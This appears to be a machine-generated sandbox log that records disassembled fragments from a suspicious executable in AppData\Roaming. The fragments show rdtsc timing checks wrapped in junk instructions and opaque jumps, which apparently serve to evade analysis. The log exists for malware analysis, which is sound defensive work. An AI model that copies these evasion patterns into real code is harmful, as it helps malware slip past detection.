Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935CC9 second address: 935CDB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F5828CEC306h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935CDB second address: 935D9B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D381Dh], ebx 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D2838h] 0x0000001c push AC4A6A3Fh 0x00000021 jg 00007F5828704A77h 0x00000027 jmp 00007F5828704A71h 0x0000002c add dword ptr [esp], 53B59641h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F5828704A68h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d stc 0x0000004e push 00000003h 0x00000050 jmp 00007F5828704A75h 0x00000055 push 00000000h 0x00000057 xor dword ptr [ebp+122D1F2Ch], edx 0x0000005d push 00000003h 0x0000005f mov ecx, dword ptr [ebp+122D28F4h] 0x00000065 push D4A09635h 0x0000006a push esi 0x0000006b jmp 00007F5828704A74h 0x00000070 pop esi 0x00000071 xor dword ptr [esp], 14A09635h 0x00000078 mov edi, dword ptr [ebp+122D2940h] 0x0000007e lea ebx, dword ptr [ebp+1244AB95h] 0x00000084 sub cl, 0000002Ah 0x00000087 xchg eax, ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935D9B second address: 935D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935D9F second address: 935DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935EC0 second address: 935EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935EC4 second address: 935EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b je 00007F5828704A72h 0x00000011 jo 00007F5828704A6Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935EDD second address: 935EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F5828CEC306h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935EEC second address: 935F14 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5828704A74h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 je 00007F5828704A74h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935F14 second address: 935F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935F1A second address: 935F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dl, bh 0x00000008 push 00000003h 0x0000000a push 00000000h 0x0000000c mov edx, 3EB584ABh 0x00000011 jo 00007F5828704A7Fh 0x00000017 call 00007F5828704A76h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop edx 0x0000001f push 00000003h 0x00000021 push 83C34CDFh 0x00000026 pushad 0x00000027 jmp 00007F5828704A6Fh 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 935F65 second address: 935FAC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 3C3CB321h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F5828CEC308h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c lea ebx, dword ptr [ebp+1244AB9Eh] 0x00000032 mov esi, dword ptr [ebp+122D2944h] 0x00000038 xchg eax, ebx 0x00000039 push ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jno 00007F5828CEC306h 0x00000042 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 93602D second address: 93603E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 93603E second address: 936042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 936042 second address: 93608C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F5828704A68h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edi, 52B5CB0Fh 0x0000002f push 00000000h 0x00000031 mov di, 8D13h 0x00000035 call 00007F5828704A69h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 93608C second address: 936090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 936090 second address: 936096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 936096 second address: 936103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5828CEC306h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 jp 00007F5828CEC308h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jns 00007F5828CEC31Ch 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jmp 00007F5828CEC30Eh 0x0000002b jmp 00007F5828CEC319h 0x00000030 popad 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 936103 second address: 936107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 956FA1 second address: 956FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 956FA7 second address: 956FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5828704A66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 956FB2 second address: 956FD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5828CEC315h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 95531D second address: 95534D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5828704A6Ch 0x00000008 push edx 0x00000009 jmp 00007F5828704A72h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F5828704A68h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 955495 second address: 955499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 955499 second address: 9554C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jp 00007F5828704A66h 0x00000019 je 00007F5828704A66h 0x0000001f pop edi 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9554C5 second address: 9554D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Eh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9558B4 second address: 9558B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 955D11 second address: 955D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 955D15 second address: 955D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5828704A6Dh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 955EA9 second address: 955EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 955EAD second address: 955EB9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 94BEED second address: 94BEF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 94BEF5 second address: 94BEFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 94BEFB second address: 94BEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 94BEFF second address: 94BF26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Fh 0x00000007 jbe 00007F5828704A66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F5828704A66h 0x00000017 jnp 00007F5828704A66h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 92096E second address: 920985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5828CEC30Dh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 920985 second address: 920989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 920989 second address: 920997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 920997 second address: 92099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 92099B second address: 92099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 92099F second address: 9209A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9209A5 second address: 9209AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9209AB second address: 9209AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9209AF second address: 9209B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9209B5 second address: 9209C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F5828704A66h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9568BE second address: 9568C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9568C3 second address: 9568D6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5828704A6Eh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9568D6 second address: 9568DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 95A0C6 second address: 95A0D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F5828704A68h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9275B2 second address: 9275B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 95C36F second address: 95C375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 962430 second address: 962436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 961965 second address: 96196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96200B second address: 962024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 jmp 00007F5828CEC30Fh 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 963771 second address: 963775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96383F second address: 963855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 963855 second address: 96388B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5828704A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F5828704A77h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5828704A6Ah 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96388B second address: 9638AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5828CEC312h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9638AA second address: 9638B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9638B1 second address: 963904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F5828CEC308h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 add dword ptr [ebp+122D1F2Ch], ecx 0x00000028 sub si, F48Bh 0x0000002d call 00007F5828CEC309h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F5828CEC311h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 963A48 second address: 963A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 963EA4 second address: 963EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96436E second address: 964372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 964372 second address: 964376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9643F7 second address: 96440E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5828704A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F5828704A66h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96440E second address: 964425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC313h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 964506 second address: 96451B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828704A70h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96467D second address: 964687 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 964687 second address: 9646A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A75h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 964981 second address: 964987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 964987 second address: 96498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96498B second address: 96499D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F5828CEC310h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96499D second address: 9649CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5828704A68h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D2B70h] 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9649CD second address: 9649DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 964EB6 second address: 964EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 964EBA second address: 964EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 964EC6 second address: 964F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F5828704A78h 0x0000000b popad 0x0000000c nop 0x0000000d pushad 0x0000000e movzx esi, si 0x00000011 or eax, dword ptr [ebp+122D561Fh] 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c sbb esi, 08A5F7D0h 0x00000022 push eax 0x00000023 pushad 0x00000024 push edi 0x00000025 push esi 0x00000026 pop esi 0x00000027 pop edi 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 966938 second address: 966957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC318h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9660C6 second address: 9660CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9660CC second address: 9660D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9660D1 second address: 9660F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9673C1 second address: 9673CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
